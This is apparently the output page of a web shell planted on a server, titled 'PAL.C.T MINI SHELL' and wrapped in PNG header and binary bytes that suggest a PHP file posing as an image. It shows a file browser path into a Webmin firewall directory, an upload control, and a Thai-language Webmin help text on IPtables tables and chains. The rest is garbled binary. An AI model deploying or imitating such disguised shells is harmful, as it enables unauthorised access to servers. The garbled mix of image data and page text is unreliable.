php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/firewall6/help/
upload
files >> //usr/libexec/webmin/firewall6/help/intro.th.auto.html

<header> ไฟร์วอลล์ Linux </header><h3> แนะนำโมดูล </h3> โมดูลนี้ช่วยให้คุณสามารถกำหนดค่าคุณสมบัติไฟร์วอลล์ IPtables ที่พบในเคอร์เนล Linux 2.4 ซีรี่ส์ ต่างจากโปรแกรมกำหนดค่าไฟร์วอลล์อื่น ๆ แทนที่จะสร้างเชลล์สคริปต์ที่ตั้งค่าไฟร์วอลล์มันอ่านและแก้ไขไฟล์บันทึกในรูปแบบที่อ่านและเขียนโดย <tt>ipi (6) tables-restore</tt> และ <tt>ipi (6) tables-save</tt> ตามลำดับ <p> หากคุณมีไฟร์วอลล์ในระบบที่ติดตั้งด้วยตนเองหรือจากไฟล์สคริปต์โมดูลจะเสนอให้แปลงเป็นไฟล์บันทึก IPtables สำหรับคุณและสร้างสคริปต์เพื่อให้ทำงานในเวลาบูตเพื่อเปิดใช้งานกฎใน ไฟล์ อย่างไรก็ตามหากคุณทำเช่นนี้คุณไม่ควรแก้ไขสคริปต์กฎไฟร์วอลล์ของคุณอีกต่อไปและควรปิดใช้งานไม่ให้ทำงานในเวลาบูตเช่นกัน <p><h3> ภาพรวมของ IPtables </h3> ทุกแพ็กเก็ตเครือข่ายที่เข้ามาออกจากหรือถูกส่งต่อโดยระบบของคุณจะถูกตรวจสอบกับเครือข่ายหนึ่งเครือข่ายหรือมากกว่าเพื่อพิจารณาว่าจะเกิดอะไรขึ้น แต่ละกลุ่มประกอบด้วยกฎศูนย์หรือมากกว่ากฎแต่ละข้อมีเงื่อนไข (เพื่อกำหนดว่ามันตรงกับแพ็กเก็ตใด) และการกระทำ (เพื่อควบคุมสิ่งที่เกิดขึ้นกับแพ็คเก็ตที่ตรงกัน) แต่ละกลุ่มมีการกระทำเริ่มต้นที่ควบคุมสิ่งที่เกิดขึ้นกับแพ็คเก็ตที่ไม่ตรงกับกฎใด ๆ <p> แต่ละเชนเป็นส่วนหนึ่งของตารางซึ่งปัจจุบันมีสาม: <ul><li> <b>การกรองแพ็คเก็ต ( <tt>ตัวกรอง</tt> )</b> <br> โซ่ในตารางนี้สามารถใช้เพื่อควบคุมข้อมูลที่เข้ามาในระบบของคุณจากโฮสต์อื่น ๆ ในเครือข่ายข้อมูลที่ส่งออกจากระบบของคุณโดยผู้ใช้และกระบวนการและข้อมูลที่ส่งต่อโดยระบบของคุณหากมันทำหน้าที่เป็นเราเตอร์ <p><li> <b>การแปลที่อยู่เครือข่าย ( <tt>nat</tt> )</b> <br> ตารางนี้สามารถใช้สำหรับการตั้งค่า NAT หรือการหลอกลวงซึ่งมีประโยชน์หากคุณต้องการให้เครือข่ายทั้งหมดของเครื่องสามารถเข้าถึงอินเทอร์เน็ตผ่านที่อยู่ IP เดียวเท่านั้น <p><li> <b>การเปลี่ยนแปลงแพ็คเก็ต ( <tt>mangle</tt> )</b> <br> ตารางนี้ใช้สำหรับการแก้ไขแพ็กเก็ตที่ส่งต่อโดยหรือส่งออกจากระบบของคุณ <p></ul> นอกเหนือจากเชนมาตรฐานที่เป็นส่วนหนึ่งของแต่ละตารางแล้วคุณยังสามารถสร้างเชนของคุณเองที่สามารถรันได้โดยกฎในเชนย่อยที่มีอยู่ภายใน สิ่งนี้มีประโยชน์สำหรับการจัดกลุ่มและกฎการแบ่งปันที่อาจใช้ในหลาย ๆ ที่ <p><h3> หน้าหลัก </h3> หน้าหลักของโมดูลนี้แสดงรายการเชนและกฎทั้งหมดจากหนึ่งในตารางที่มีให้เลือกจากรายการในมุมบนซ้าย ด้านล่างเป็นส่วนสำหรับแต่ละห่วงโซ่ในตารางปัจจุบันโดยมีกฎทั้งหมดในแต่ละห่วงโซ่ที่ระบุไว้และเงื่อนไขของโซ่ที่อธิบายถึงความสามารถที่ดีที่สุดของโมดูล สำหรับแต่ละเชนคุณสามารถเปลี่ยนการดำเนินการเริ่มต้นโดยใช้รายการดรอปดาวน์หากเชนเป็นหนึ่งในบิวด์อินสำหรับตารางหรือลบออกด้วยปุ่มลบเชนหากมันเป็นผู้ใช้กำหนด <p> คุณสามารถคลิกที่กฎใด ๆ ในห่วงโซ่เพื่อแก้ไขคลิกลูกศรทางด้านขวาของแต่ละแถวเพื่อเลื่อนขึ้นหรือลงหรือคลิกที่ปุ่มเพิ่มกฎเพื่อเพิ่มกฎใหม่ การเพิ่มหรือแก้ไขกฎจะนำคุณไปสู่หน้าที่คุณสามารถเลือกการกระทำสำหรับแต่ละกฎและเงื่อนไขที่จะดำเนินการการกระทำ <p> ที่ด้านล่างของหน้าจะมีปุ่มสำหรับทำให้การกำหนดค่าไฟร์วอลล์ปัจจุบันทำงานโดยการโหลดลงในเคอร์เนลด้วยคำสั่ง <tt>ipi (6) tables-restore</tt> ด้านล่างเป็นปุ่มสำหรับทำการย้อนกลับ - ใช้การกำหนดค่าที่อยู่ในเคอร์เนลและทำให้สามารถแก้ไขได้ ในที่สุดหากการแจกจ่ายของคุณรองรับจะมีปุ่มที่จะเปลี่ยนว่าไฟร์วอลล์จะเปิดใช้งานในเวลาบูตหรือไม่ <p><h3> กรองโซ่ </h3> เพื่อการทำงานร่วมกันที่ดีขึ้นกับสคริปต์ iptables ภายนอกคุณสามารถแยกแต่ละเครือข่ายออกจากการประมวลผลโดยไฟร์วอลล์ ในการทำเช่นนี้คุณต้องเลือกการประมวลผลกฎโดยตรงในการตั้งค่าและป้อนรายการตัวกรองซึ่งไม่รวมการเชื่อมโยงที่เหมาะสมจากการประมวลผล กลุ่มที่ไม่ได้รับการแก้ไขจากการแก้ไขจะมีการตั้งค่าสถานะด้วยข้อความ &quot;ไม่ได้จัดการโดยไฟร์วอลล์&quot; <p><h3> ชุด IP </h3> ตาราง ip (6) เวอร์ชันที่ใหม่กว่าสนับสนุนส่วนขยาย ipset ชุด IP เป็นรายการที่อยู่ IP ในหน่วยความจำหลักซึ่งสามารถค้นหาได้อย่างมีประสิทธิภาพและใช้เป็นเงื่อนไขในกฎ ในหน้าหลักชุด IP ที่มีอยู่ที่สามารถใช้งานโดยกฎจะปรากฏขึ้น ปัจจุบันยังไม่สามารถจัดการสิ่งเหล่านี้ในไฟร์วอลล์ <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`